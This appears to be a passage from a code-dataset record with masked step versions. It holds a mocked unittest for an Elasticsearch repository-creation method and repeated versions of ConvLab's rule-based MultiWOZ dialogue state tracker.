"step-4": "<mask token>\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n<mask token>\nsys.path.append(os.getcwd())\n<mask token>\n__version__ = version.__version__\n\n\nclass Elasticsearch(object):\n \"\"\"Class: ElasticSearch\n\n Description: Class representation of the Elasticsearch class.\n\n Methods:\n __init__\n\n \"\"\"\n\n def __init__(self, host_list, port=9200):\n \"\"\"Method: __init__\n\n Description: Initialization instance of the class.\n\n Arguments:\n\n \"\"\"\n self.hosts = host_list\n self.port = port\n self.info_status = {'cluster_name': 'ClusterName', 'name': 'servername'\n }\n\n\nclass UnitTest(unittest.TestCase):\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp\n test_not_created_repo\n test_not_detected_repo\n test_missing_repo_name\n test_no_repo_dir\n test_no_repo_name\n test_default\n\n \"\"\"\n\n def setUp(self):\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n self.host_list = ['host1', 'host2']\n self.repo = 'reponame'\n self.repo2 = 'reponame2'\n self.repo3 = 'reponame3'\n self.els = Elasticsearch(self.host_list)\n self.repo_dir = '/dir/path/dump2'\n self.nodes_data = {'serverid1': {'name': 'hostname1', 'settings': {\n 'path': {'data': ['/dir/data1'], 'logs': ['/dir/logs1']}}},\n 'serverid2': {'name': 'hostname2', 'settings': {'path': {'data':\n ['/dir/data2'], 'logs': ['/dir/logs2']}}}}\n self.health_data = {'status': 'green', 'cluster_name': 'ClusterName'}\n self.dump = '/dir/path/dump'\n self.repo_list = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict2 = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}, 'reponame2': {'type': 'dbdump',\n 'settings': {'location': '/dir/path/dump2'}}}\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_created_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_created_repo\n\n Description: Test with repository not created.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository creation failure: ' +\n ' reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_detected_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_detected_repo\n\n Description: Test with repository not detected.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository not detected: reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_missing_repo_name(self, mock_es, mock_repo):\n \"\"\"Function: test_missing_repo_name\n\n Description: Test with missing repo named.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo = None\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (True, \n 'ERROR: Missing repo name or' +\n \" directory: 'None', '/dir/path/dump2'\"))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_no_repo_dir(self, mock_es, mock_repo):\n \"\"\"Function: test_no_repo_dir\n\n Description: Test with no repo directory passed.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo), (False, None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_no_repo_name(self, mock_es, mock_repo):\n \"\"\"Function: test_no_repo_name\n\n Description: Test with no repo named passed.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo2, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (False, None)\n )\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_default(self, mock_es, mock_repo):\n \"\"\"Function: test_default\n\n Description: Test with default settings.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo2, self.repo_dir), (False,\n None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "#!/usr/bin/python\n# Classification (U)\n\n\"\"\"Program: elasticsearchrepo_create_repo.py\n\n Description: Unit testing of create_repo in\n elastic_class.ElasticSearchRepo class.\n\n Usage:\n test/unit/elastic_class/elasticsearchrepo_create_repo.py\n\n Arguments:\n\n\"\"\"\n\n# Libraries and Global Variables\n\n# Standard\nimport sys\nimport os\n\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n\n# Third-party\nimport mock\n\n# Local\nsys.path.append(os.getcwd())\nimport elastic_class\nimport version\n\n__version__ = version.__version__\n\n\nclass Elasticsearch(object):\n\n \"\"\"Class: ElasticSearch\n\n Description: Class representation of the Elasticsearch class.\n\n Methods:\n __init__\n\n \"\"\"\n\n def __init__(self, host_list, port=9200):\n\n \"\"\"Method: __init__\n\n Description: Initialization instance of the class.\n\n Arguments:\n\n \"\"\"\n\n self.hosts = host_list\n self.port = port\n self.info_status = {\"cluster_name\": \"ClusterName\",\n \"name\": \"servername\"}\n\n\nclass UnitTest(unittest.TestCase):\n\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp\n test_not_created_repo\n test_not_detected_repo\n test_missing_repo_name\n test_no_repo_dir\n test_no_repo_name\n test_default\n\n \"\"\"\n\n def setUp(self):\n\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n\n self.host_list = [\"host1\", \"host2\"]\n self.repo = \"reponame\"\n self.repo2 = \"reponame2\"\n self.repo3 = \"reponame3\"\n self.els = Elasticsearch(self.host_list)\n self.repo_dir = \"/dir/path/dump2\"\n self.nodes_data = {\"serverid1\": {\"name\": \"hostname1\", \"settings\":\n {\"path\": {\"data\": [\"/dir/data1\"],\n \"logs\": [\"/dir/logs1\"]}}},\n \"serverid2\": {\"name\": \"hostname2\", \"settings\":\n {\"path\": {\"data\": [\"/dir/data2\"],\n \"logs\": [\"/dir/logs2\"]}}}}\n self.health_data = {\"status\": \"green\", \"cluster_name\": \"ClusterName\"}\n self.dump = \"/dir/path/dump\"\n self.repo_list = {\"reponame\": {\"type\": \"dbdump\", \"settings\":\n {\"location\": self.dump}}}\n self.repo_dict = {\"reponame\": {\"type\": \"dbdump\", \"settings\":\n {\"location\": self.dump}}}\n self.repo_dict2 = {\"reponame\": {\"type\": \"dbdump\", \"settings\":\n {\"location\": self.dump}},\n \"reponame2\": {\"type\": \"dbdump\", \"settings\":\n {\"location\": \"/dir/path/dump2\"}}}\n\n @mock.patch(\"elastic_class.create_snapshot_repo\",\n mock.Mock(return_value={\"acknowledged\": False}))\n @mock.patch(\"elastic_class.ElasticSearch.update_status\",\n mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.is_active\", mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.get_repo_list\")\n @mock.patch(\"elastic_class.elasticsearch.Elasticsearch\")\n def test_not_created_repo(self, mock_es, mock_repo):\n\n \"\"\"Function: test_not_created_repo\n\n Description: Test with repository not created.\n\n Arguments:\n\n \"\"\"\n\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,\n repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(\n els.create_repo(self.repo3, self.repo_dir),\n (True,\n \"ERROR: Repository creation failure: \" +\n \" reponame3, /dir/path/dump2\"))\n\n @mock.patch(\"elastic_class.create_snapshot_repo\",\n mock.Mock(return_value={\"acknowledged\": True}))\n @mock.patch(\"elastic_class.ElasticSearch.update_status\",\n mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.is_active\", mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.get_repo_list\")\n @mock.patch(\"elastic_class.elasticsearch.Elasticsearch\")\n def test_not_detected_repo(self, mock_es, mock_repo):\n\n \"\"\"Function: test_not_detected_repo\n\n Description: Test with repository not detected.\n\n Arguments:\n\n \"\"\"\n\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,\n repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(\n els.create_repo(self.repo3, self.repo_dir),\n (True,\n \"ERROR: Repository not detected: reponame3, /dir/path/dump2\"))\n\n @mock.patch(\"elastic_class.create_snapshot_repo\",\n mock.Mock(return_value={\"acknowledged\": False}))\n @mock.patch(\"elastic_class.ElasticSearch.update_status\",\n mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.is_active\", mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.get_repo_list\")\n @mock.patch(\"elastic_class.elasticsearch.Elasticsearch\")\n def test_missing_repo_name(self, mock_es, mock_repo):\n\n \"\"\"Function: test_missing_repo_name\n\n Description: Test with missing repo named.\n\n Arguments:\n\n \"\"\"\n\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,\n repo_dir=self.repo_dir)\n els.connect()\n els.repo = None\n self.assertEqual(\n els.create_repo(repo_dir=self.repo_dir),\n (True,\n \"ERROR: Missing repo name or\" +\n \" directory: 'None', '/dir/path/dump2'\"))\n\n @mock.patch(\"elastic_class.create_snapshot_repo\",\n mock.Mock(return_value={\"acknowledged\": True}))\n @mock.patch(\"elastic_class.ElasticSearch.update_status\",\n mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.is_active\", mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.get_repo_list\")\n @mock.patch(\"elastic_class.elasticsearch.Elasticsearch\")\n def test_no_repo_dir(self, mock_es, mock_repo):\n\n \"\"\"Function: test_no_repo_dir\n\n Description: Test with no repo directory passed.\n\n Arguments:\n\n \"\"\"\n\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,\n repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo), (False, None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch(\"elastic_class.create_snapshot_repo\",\n mock.Mock(return_value={\"acknowledged\": True}))\n @mock.patch(\"elastic_class.ElasticSearch.update_status\",\n mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.is_active\", mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.get_repo_list\")\n @mock.patch(\"elastic_class.elasticsearch.Elasticsearch\")\n def test_no_repo_name(self, mock_es, mock_repo):\n\n \"\"\"Function: test_no_repo_name\n\n Description: Test with no repo named passed.\n\n Arguments:\n\n \"\"\"\n\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo2,\n repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir),\n (False, None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch(\"elastic_class.create_snapshot_repo\",\n mock.Mock(return_value={\"acknowledged\": True}))\n @mock.patch(\"elastic_class.ElasticSearch.update_status\",\n mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.is_active\", mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.get_repo_list\")\n @mock.patch(\"elastic_class.elasticsearch.Elasticsearch\")\n def test_default(self, mock_es, mock_repo):\n\n \"\"\"Function: test_default\n\n Description: Test with default settings.\n\n Arguments:\n\n \"\"\"\n\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,\n repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo2, self.repo_dir),\n (False, None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n",
"step-ids": [
10,
12,
13,
14,
16
]
}
|
[
10,
12,
13,
14,
16
] |
<|reserved_special_token_0|>
class RuleDST(Tracker):
<|reserved_special_token_0|>
def __init__(self):
Tracker.__init__(self)
self.state = init_state()
prefix = os.path.dirname(os.path.dirname(convlab.__file__))
self.value_dict = json.load(open(prefix +
'/data/multiwoz/value_dict.json'))
def update(self, user_act=None):
if not isinstance(user_act, dict):
raise Exception(
"Expect user_act to be <class 'dict'> type but get {}.".
format(type(user_act)))
previous_state = self.state
new_belief_state = copy.deepcopy(previous_state['belief_state'])
new_request_state = copy.deepcopy(previous_state['request_state'])
for domain_type in user_act.keys():
domain, tpe = domain_type.lower().split('-')
if domain in ['unk', 'general', 'booking']:
continue
if tpe == 'inform':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if k is None:
continue
try:
assert domain in new_belief_state
except:
raise Exception(
'Error: domain <{}> not in new belief state'.
format(domain))
domain_dic = new_belief_state[domain]
assert 'semi' in domain_dic
assert 'book' in domain_dic
if k in domain_dic['semi']:
nvalue = normalize_value(self.value_dict, domain, k, v)
new_belief_state[domain]['semi'][k] = nvalue
elif k in domain_dic['book']:
new_belief_state[domain]['book'][k] = v
elif k.lower() in domain_dic['book']:
new_belief_state[domain]['book'][k.lower()] = v
elif k == 'trainID' and domain == 'train':
new_belief_state[domain]['book'][k] = normalize_value(
self.value_dict, domain, k, v)
else:
with open('unknown_slot.log', 'a+') as f:
f.write('unknown slot name <{}> of domain <{}>\n'
.format(k, domain))
elif tpe == 'request':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if domain not in new_request_state:
new_request_state[domain] = {}
if k not in new_request_state[domain]:
new_request_state[domain][k] = 0
new_state = copy.deepcopy(previous_state)
new_state['belief_state'] = new_belief_state
new_state['request_state'] = new_request_state
new_state['user_action'] = user_act
self.state = new_state
return self.state
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RuleDST(Tracker):
<|reserved_special_token_0|>
def __init__(self):
Tracker.__init__(self)
self.state = init_state()
prefix = os.path.dirname(os.path.dirname(convlab.__file__))
self.value_dict = json.load(open(prefix +
'/data/multiwoz/value_dict.json'))
def update(self, user_act=None):
if not isinstance(user_act, dict):
raise Exception(
"Expect user_act to be <class 'dict'> type but get {}.".
format(type(user_act)))
previous_state = self.state
new_belief_state = copy.deepcopy(previous_state['belief_state'])
new_request_state = copy.deepcopy(previous_state['request_state'])
for domain_type in user_act.keys():
domain, tpe = domain_type.lower().split('-')
if domain in ['unk', 'general', 'booking']:
continue
if tpe == 'inform':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if k is None:
continue
try:
assert domain in new_belief_state
except:
raise Exception(
'Error: domain <{}> not in new belief state'.
format(domain))
domain_dic = new_belief_state[domain]
assert 'semi' in domain_dic
assert 'book' in domain_dic
if k in domain_dic['semi']:
nvalue = normalize_value(self.value_dict, domain, k, v)
new_belief_state[domain]['semi'][k] = nvalue
elif k in domain_dic['book']:
new_belief_state[domain]['book'][k] = v
elif k.lower() in domain_dic['book']:
new_belief_state[domain]['book'][k.lower()] = v
elif k == 'trainID' and domain == 'train':
new_belief_state[domain]['book'][k] = normalize_value(
self.value_dict, domain, k, v)
else:
with open('unknown_slot.log', 'a+') as f:
f.write('unknown slot name <{}> of domain <{}>\n'
.format(k, domain))
elif tpe == 'request':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if domain not in new_request_state:
new_request_state[domain] = {}
if k not in new_request_state[domain]:
new_request_state[domain][k] = 0
new_state = copy.deepcopy(previous_state)
new_state['belief_state'] = new_belief_state
new_state['request_state'] = new_request_state
new_state['user_action'] = user_act
self.state = new_state
return self.state
def init_session(self):
self.state = init_state()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RuleDST(Tracker):
"""Rule based DST which trivially updates new values from NLU result to states."""
def __init__(self):
Tracker.__init__(self)
self.state = init_state()
prefix = os.path.dirname(os.path.dirname(convlab.__file__))
self.value_dict = json.load(open(prefix +
'/data/multiwoz/value_dict.json'))
def update(self, user_act=None):
if not isinstance(user_act, dict):
raise Exception(
"Expect user_act to be <class 'dict'> type but get {}.".
format(type(user_act)))
previous_state = self.state
new_belief_state = copy.deepcopy(previous_state['belief_state'])
new_request_state = copy.deepcopy(previous_state['request_state'])
for domain_type in user_act.keys():
domain, tpe = domain_type.lower().split('-')
if domain in ['unk', 'general', 'booking']:
continue
if tpe == 'inform':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if k is None:
continue
try:
assert domain in new_belief_state
except:
raise Exception(
'Error: domain <{}> not in new belief state'.
format(domain))
domain_dic = new_belief_state[domain]
assert 'semi' in domain_dic
assert 'book' in domain_dic
if k in domain_dic['semi']:
nvalue = normalize_value(self.value_dict, domain, k, v)
new_belief_state[domain]['semi'][k] = nvalue
elif k in domain_dic['book']:
new_belief_state[domain]['book'][k] = v
elif k.lower() in domain_dic['book']:
new_belief_state[domain]['book'][k.lower()] = v
elif k == 'trainID' and domain == 'train':
new_belief_state[domain]['book'][k] = normalize_value(
self.value_dict, domain, k, v)
else:
with open('unknown_slot.log', 'a+') as f:
f.write('unknown slot name <{}> of domain <{}>\n'
.format(k, domain))
elif tpe == 'request':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if domain not in new_request_state:
new_request_state[domain] = {}
if k not in new_request_state[domain]:
new_request_state[domain][k] = 0
new_state = copy.deepcopy(previous_state)
new_state['belief_state'] = new_belief_state
new_state['request_state'] = new_request_state
new_state['user_action'] = user_act
self.state = new_state
return self.state
def init_session(self):
self.state = init_state()
<|reserved_special_token_1|>
import copy
import json
import os
import convlab
from convlab.modules.dst.multiwoz.dst_util import init_state
from convlab.modules.dst.multiwoz.dst_util import normalize_value
from convlab.modules.dst.state_tracker import Tracker
from convlab.modules.util.multiwoz.multiwoz_slot_trans import REF_SYS_DA
class RuleDST(Tracker):
"""Rule based DST which trivially updates new values from NLU result to states."""
def __init__(self):
Tracker.__init__(self)
self.state = init_state()
prefix = os.path.dirname(os.path.dirname(convlab.__file__))
self.value_dict = json.load(open(prefix +
'/data/multiwoz/value_dict.json'))
def update(self, user_act=None):
if not isinstance(user_act, dict):
raise Exception(
"Expect user_act to be <class 'dict'> type but get {}.".
format(type(user_act)))
previous_state = self.state
new_belief_state = copy.deepcopy(previous_state['belief_state'])
new_request_state = copy.deepcopy(previous_state['request_state'])
for domain_type in user_act.keys():
domain, tpe = domain_type.lower().split('-')
if domain in ['unk', 'general', 'booking']:
continue
if tpe == 'inform':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if k is None:
continue
try:
assert domain in new_belief_state
except:
raise Exception(
'Error: domain <{}> not in new belief state'.
format(domain))
domain_dic = new_belief_state[domain]
assert 'semi' in domain_dic
assert 'book' in domain_dic
if k in domain_dic['semi']:
nvalue = normalize_value(self.value_dict, domain, k, v)
new_belief_state[domain]['semi'][k] = nvalue
elif k in domain_dic['book']:
new_belief_state[domain]['book'][k] = v
elif k.lower() in domain_dic['book']:
new_belief_state[domain]['book'][k.lower()] = v
elif k == 'trainID' and domain == 'train':
new_belief_state[domain]['book'][k] = normalize_value(
self.value_dict, domain, k, v)
else:
with open('unknown_slot.log', 'a+') as f:
f.write('unknown slot name <{}> of domain <{}>\n'
.format(k, domain))
elif tpe == 'request':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if domain not in new_request_state:
new_request_state[domain] = {}
if k not in new_request_state[domain]:
new_request_state[domain][k] = 0
new_state = copy.deepcopy(previous_state)
new_state['belief_state'] = new_belief_state
new_state['request_state'] = new_request_state
new_state['user_action'] = user_act
self.state = new_state
return self.state
def init_session(self):
self.state = init_state()
<|reserved_special_token_1|>
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import copy
import json
import os
import convlab
from convlab.modules.dst.multiwoz.dst_util import init_state
from convlab.modules.dst.multiwoz.dst_util import normalize_value
from convlab.modules.dst.state_tracker import Tracker
from convlab.modules.util.multiwoz.multiwoz_slot_trans import REF_SYS_DA
class RuleDST(Tracker):
"""Rule based DST which trivially updates new values from NLU result to states."""
def __init__(self):
Tracker.__init__(self)
self.state = init_state()
prefix = os.path.dirname(os.path.dirname(convlab.__file__))
self.value_dict = json.load(open(prefix+'/data/multiwoz/value_dict.json'))
def update(self, user_act=None):
# print('------------------{}'.format(user_act))
if not isinstance(user_act, dict):
raise Exception('Expect user_act to be <class \'dict\'> type but get {}.'.format(type(user_act)))
previous_state = self.state
new_belief_state = copy.deepcopy(previous_state['belief_state'])
new_request_state = copy.deepcopy(previous_state['request_state'])
for domain_type in user_act.keys():
domain, tpe = domain_type.lower().split('-')
if domain in ['unk', 'general', 'booking']:
continue
if tpe == 'inform':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if k is None:
continue
try:
assert domain in new_belief_state
except:
raise Exception('Error: domain <{}> not in new belief state'.format(domain))
domain_dic = new_belief_state[domain]
assert 'semi' in domain_dic
assert 'book' in domain_dic
if k in domain_dic['semi']:
nvalue = normalize_value(self.value_dict, domain, k, v)
# if nvalue != v:
# _log('domain {} slot {} value {} -> {}'.format(domain, k, v, nvalue))
new_belief_state[domain]['semi'][k] = nvalue
elif k in domain_dic['book']:
new_belief_state[domain]['book'][k] = v
elif k.lower() in domain_dic['book']:
new_belief_state[domain]['book'][k.lower()] = v
elif k == 'trainID' and domain == 'train':
new_belief_state[domain]['book'][k] = normalize_value(self.value_dict, domain, k, v)
else:
# raise Exception('unknown slot name <{}> of domain <{}>'.format(k, domain))
with open('unknown_slot.log', 'a+') as f:
f.write('unknown slot name <{}> of domain <{}>\n'.format(k, domain))
elif tpe == 'request':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if domain not in new_request_state:
new_request_state[domain] = {}
if k not in new_request_state[domain]:
new_request_state[domain][k] = 0
new_state = copy.deepcopy(previous_state)
new_state['belief_state'] = new_belief_state
new_state['request_state'] = new_request_state
new_state['user_action'] = user_act
self.state = new_state
return self.state
def init_session(self):
self.state = init_state()
|
flexible
|
{
"blob_id": "8de82d09c8a9a1c1db59b0cac9cf8dda04f35847",
"index": 3335,
"step-1": "<mask token>\n\n\nclass RuleDST(Tracker):\n <mask token>\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass RuleDST(Tracker):\n <mask token>\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n\n def init_session(self):\n self.state = init_state()\n",
